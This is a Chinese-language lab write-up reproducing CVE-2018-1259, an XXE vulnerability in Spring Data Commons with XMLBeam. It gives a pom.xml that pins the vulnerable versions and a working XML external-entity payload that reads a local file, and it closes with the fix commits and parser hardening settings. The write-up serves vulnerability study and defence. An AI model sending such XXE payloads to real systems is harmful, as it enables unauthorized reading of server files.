CVE-2018-1259

漏洞简介

XMLBeans 提供了底层XML数据的对象视图,同时还能访问原始的XML信息集合。Spring Data Commons 1.13至1.13.11以及2.0至2.0.6的版本在与XMLBeam1.4.14或更早的版本进行结合使用时,XMLBeam不会限制XML外部实体应用,导致未经身份验证的远程恶意用户可以针对Spring Data的请求绑定特定的参数,访问系统上的任意文件

环境搭建

获取Spring项目包

1
git clone https://github.com/spring-projects/spring-data-examples.git

IDEA打开项目spring-data-examples/web/projection

修改pom.xml文件(将依赖修改为有漏洞的版本)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<artifactId>spring-data-web-projection</artifactId>
<name>Spring Data - JSON and XML projection web example</name>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>

<dependency>
<groupId>org.springframework.data</groupId>
<artifactId>spring-data-commons</artifactId>
<version>2.0.5.RELEASE</version>
</dependency>

<dependency>
<groupId>com.jayway.jsonpath</groupId>
<artifactId>json-path</artifactId>
</dependency>

<dependency>
<groupId>org.xmlbeam</groupId>
<artifactId>xmlprojector</artifactId>
<version>1.4.14</version>
</dependency>
</dependencies>

<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>

这里选择 spring-data-commons采用2.0.5版本, XMLBeam采用1.4.14版本

修改后 右键->Maven->reload project 如果不行试试 File -> Invalidate Caches -> Invaliidate and restart

然后右键运行 默认执行在8080端口

img

漏洞复现

首先构造正常的XML

1
2
<?xml version="1.0" encoding="UTF-8"?>
<user><firstname>aaaa</firstname><lastname>bbbb</lastname></user>

POST方法请求体放入xml 注意Content-Type: application/XML

img

可以看到对应回显

然后增加DTD读取任意文件

1
2
3
4
5
6
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY aaaa SYSTEM "file:///E:/path/to/flag.txt" >
]>
<user><firstname>&aaaa;</firstname><lastname>bbbb</lastname></user>

回显:

1
Received firstname: FLAG{!!!!!!!!!!!!!!HERE I AM!!!!!!!!!!!!!!}, lastname: bbbb

漏洞修复

1
2
3
4
5
# xmlbeam
https://github.com/SvenEwald/xmlbeam/commit/f8e943f44961c14cf1316deb56280f7878702ee1

# spring-data-commons
https://github.com/spring-projects/spring-data-commons/commit/b8974a292ab463a304eda987632be4d9c145f5f8

不允许XML包含外部实体,禁用DTD

1
2
3
4
5
6
7
8
9
10
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);


private static final String[] FEATURE_DEFAULTS = new String[] { "http://apache.org/xml/features/disallow-doctype-decl#true", //
"http://xml.org/sax/features/external-general-entities#false", //
"http://xml.org/sax/features/external-parameter-entities#false", //
"http://apache.org/xml/features/nonvalidating/load-external-dtd#false" };
2023-11-20

⬆︎TOP